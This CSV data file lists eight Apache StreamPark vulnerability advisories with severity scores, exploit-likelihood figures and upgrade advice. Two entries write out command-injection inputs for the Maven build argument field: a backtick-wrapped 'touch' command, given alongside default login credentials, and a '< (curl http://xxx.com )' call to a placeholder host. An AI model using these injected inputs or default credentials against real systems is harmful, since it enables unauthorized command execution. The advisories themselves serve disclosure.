cve,link,title,description,vendor,products,score,severity,epss,cisa,cisa_published,article,ransomware,exploited,exploited_date,poc,trended,trended_no_1,trended_no_1_date,published,trended_score CVE-2024-29737,https://securityvulnerability.io/vulnerability/CVE-2024-29737,Attack vulnerability in Project module,"In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low. Mitigation: all users should upgrade to 2.1.4 Background info: Log in to Streampark using the default username (e.g. test1, test2, test3) and the default password (streampark). Navigate to the Project module, then add a new project. Enter the git repository address of the project and input `touch /tmp/success_2.1.2` as the ""Build Argument"". Note that there is no verification and interception of the special character ""`"". As a result, you will find that this injection command will be successfully executed after executing the build. In the latest version, the special symbol ` is intercepted. ",Apache,Apache Streampark (incubating),4.7,MEDIUM,0.005049999803304672,false,,false,false,false,,,false,false,,2024-07-17T08:21:12.035Z,0 CVE-2023-52291,https://securityvulnerability.io/vulnerability/CVE-2023-52291,Dangerous Command Injection Vulnerability in Maven's Compilation,"In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low. Background: In the ""Project"" module, the maven build args  “<” operator causes command injection. e.g : “< (curl  http://xxx.com )” will be executed as a command injection, Mitigation: all users should upgrade to 2.1.4,  The ""<"" operator will blocked。 ",Apache,Apache Streampark (incubating),4.7,MEDIUM,0.005049999803304672,false,,false,false,false,,,false,false,,2024-07-17T08:16:12.520Z,0 CVE-2023-52290,https://securityvulnerability.io/vulnerability/CVE-2023-52290,Apache StreamPark (incubating): Unchecked SQL query fields trigger SQL injection vulnerability,"In streampark-console the list pages(e.g: application pages), users can sort page by field. This sort field is sent from the front-end to the back-end, and the SQL query is generated using this field. However, because this sort field isn't validated, there is a risk of SQL injection vulnerability. The attacker must successfully log into the system to launch an attack, which may cause data leakage. Since no data will be written, so this is a low-impact vulnerability. Mitigation: all users should upgrade to 2.1.4, Such parameters will be blocked. ",Apache,Apache Streampark (incubating),,,0.0004299999854993075,false,,false,false,false,,,false,false,,2024-07-16T08:15:00.000Z,0 CVE-2023-30867,https://securityvulnerability.io/vulnerability/CVE-2023-30867,Apache StreamPark (incubating): Authenticated system users could trigger SQL injection vulnerability,"In the Streampark platform, when users log in to the system and use certain features, some pages provide a name-based fuzzy search, such as job names, role names, etc. The sql syntax :select * from table where jobName like '%jobName%'. However, the jobName field may receive illegal parameters, leading to SQL injection. This could potentially result in information leakage. Mitigation: Users are recommended to upgrade to version 2.1.2, which fixes the issue. ",Apache,Apache StreamPark (incubating),4.9,MEDIUM,0.0009599999757483602,false,,false,false,false,,,false,false,,2023-12-15T13:15:00.000Z,0 CVE-2023-49898,https://securityvulnerability.io/vulnerability/CVE-2023-49898,Apache StreamPark (incubating): Authenticated system users could trigger remote command execution,"A vulnerability exists in the Streampark project module that leverages Maven's compilation capabilities, allowing unauthorized command execution. Without validation on compilation parameters, an authenticated user with system-level access could exploit this flaw. Only users logged into the Streampark system, generally trusted, can perform these actions, which minimizes the likelihood of exploitation. To mitigate this vulnerability, all users should upgrade to version 2.1.2, which addresses the issue effectively.",Apache,Apache StreamPark (incubating),7.2,HIGH,0.0009200000204145908,false,,false,false,false,,,false,false,,2023-12-15T13:15:00.000Z,0 CVE-2022-46365,https://securityvulnerability.io/vulnerability/CVE-2022-46365,Apache StreamPark (incubating): Logic error causing any account reset,"A security vulnerability in Apache StreamPark version 1.0.0 allows an authenticated user to exploit the profile modification functionality. When logged in, the application fails to verify if the username provided during a profile update belongs to the current user. This oversight allows attackers to send arbitrary usernames, potentially enabling them to modify or reset the accounts of other users. Users should upgrade to Apache StreamPark version 2.0.0 or later to mitigate this issue.",Apache,Apache Streampark (incubating),9.1,CRITICAL,0.0016299999551847577,false,,false,false,false,,,false,false,,2023-05-01T14:53:50.130Z,0 CVE-2022-45801,https://securityvulnerability.io/vulnerability/CVE-2022-45801,Apache StreamPark (incubating): LDAP Injection Vulnerability,"Apache StreamPark 1.0.0 to 2.0.0 have a LDAP injection vulnerability. LDAP Injection is an attack used to exploit web based applications that construct LDAP statements based on user input. When an application fails to properly sanitize user input, it's possible to modify LDAP statements through techniques similar to SQL Injection. LDAP injection attacks could result in the granting of permissions to unauthorized queries, and content modification inside the LDAP tree. This risk may only occur when the user logs in with ldap, and the user name and password login will not be affected, Users of the affected versions should upgrade to Apache StreamPark 2.0.0 or later. ",Apache,Apache Streampark (incubating),5.4,MEDIUM,0.0019600000232458115,false,,false,false,false,,,false,false,,2023-05-01T14:50:11.110Z,0 CVE-2022-45802,https://securityvulnerability.io/vulnerability/CVE-2022-45802,Apache StreamPark (incubating): Upload any file to any directory,"Apache StreamPark contains a file upload vulnerability that permits any user to upload JAR files as applications without verifying the file type. This oversight could lead to the uploading of malicious files to any directory, posing significant security risks. Users of affected versions are strongly advised to upgrade to Apache StreamPark 2.0.0 or later to mitigate these vulnerabilities.",Apache,Apache Streampark (incubating),9.8,CRITICAL,0.011219999752938747,false,,false,false,false,,,false,false,,2023-05-01T14:04:57.625Z,0